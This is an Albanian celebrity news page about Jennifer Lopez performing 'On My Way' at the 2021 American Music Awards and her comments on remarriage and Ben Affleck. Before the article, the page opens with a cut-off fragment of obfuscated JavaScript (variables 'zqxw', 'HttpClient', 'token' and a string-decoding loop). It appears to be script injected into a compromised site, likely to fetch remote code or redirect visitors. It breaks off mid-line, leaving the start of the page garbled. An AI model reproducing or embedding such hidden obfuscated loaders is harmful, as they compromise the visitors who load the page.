;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Me një veprim, Jennifer Lopez merr gjithë vëmendjen në “AMAs 2021”

By

Performanca e fundit e Jennifer Lopez i habiti të gjithë.

Aktorja e filmit “Marry Me” mbylli evenimentin e ndarjes së çmimeve “American Music Awards” në Teatrin Microsoft në Los Angeles, duke u siguruar që të gjithë sytë të ishin në pamjen e saj dhe performancën magjepsëse.

Ylli i muzikës u rikthye në skenën e “American Music Awards” për të debutuar këngën e saj të re për një audiencë të drejtpërdrejtë, “On My Way”, e cila është nga filmi i saj i ardhshëm, “Marry Me” me aktorë gjithashtu Owen Wilson dhe Maluma.

Duke filluar baladën e veshur me një xhaketë kostumi të zi, themeluesja e JLo Beauty ecte pas një ekrani duke shfaqur skena nga Marry Me përpara se të dilte me një fustan nusërie.

Ajo përfundoi duke hedhur mbulesën e vendosur në kokë te publiku si një buqetë me lule.

Vetëm javën e kaluar, nëna e dy fëmijëve foli për filmin e saj të ri dhe nëse mendonte apo jo të martohej përsëri.

“Po, mendoj,” tha ajo gjatë një paraqitjeje në “Today” më 18 nëntor. “Ju më njihni, unë jam romantike. Kam qenë gjithmonë”. Nëna e dy fëmijëve shtoi me shaka: “Jam martuar disa herë. Unë ende besoj në lumturinë e përjetshme me siguri. Njëqind për qind”.

Në fakt, një burim i tha më parë E! News se ajo dhe Ben Affleck, të cilët rindezën romancën e tyre në fillim të këtij viti, kanë filluar të mendojnë për të ardhmen e tyre së bashku.

“Ata janë çmendurisht të dashuruar”, ka thënë burimi. “Të kalosh kohë në qytete të ndryshme gjatë javës i ka bërë ata të ndjejnë mungesën e njëri -tjetrit dhe të dashurohen akoma më shumë”.

Burimi shtoi: “Ata po bëjnë shumë plane dhe po presin me padurim të ardhmen e tyre së bashku”.

Artikuj të ngjashëm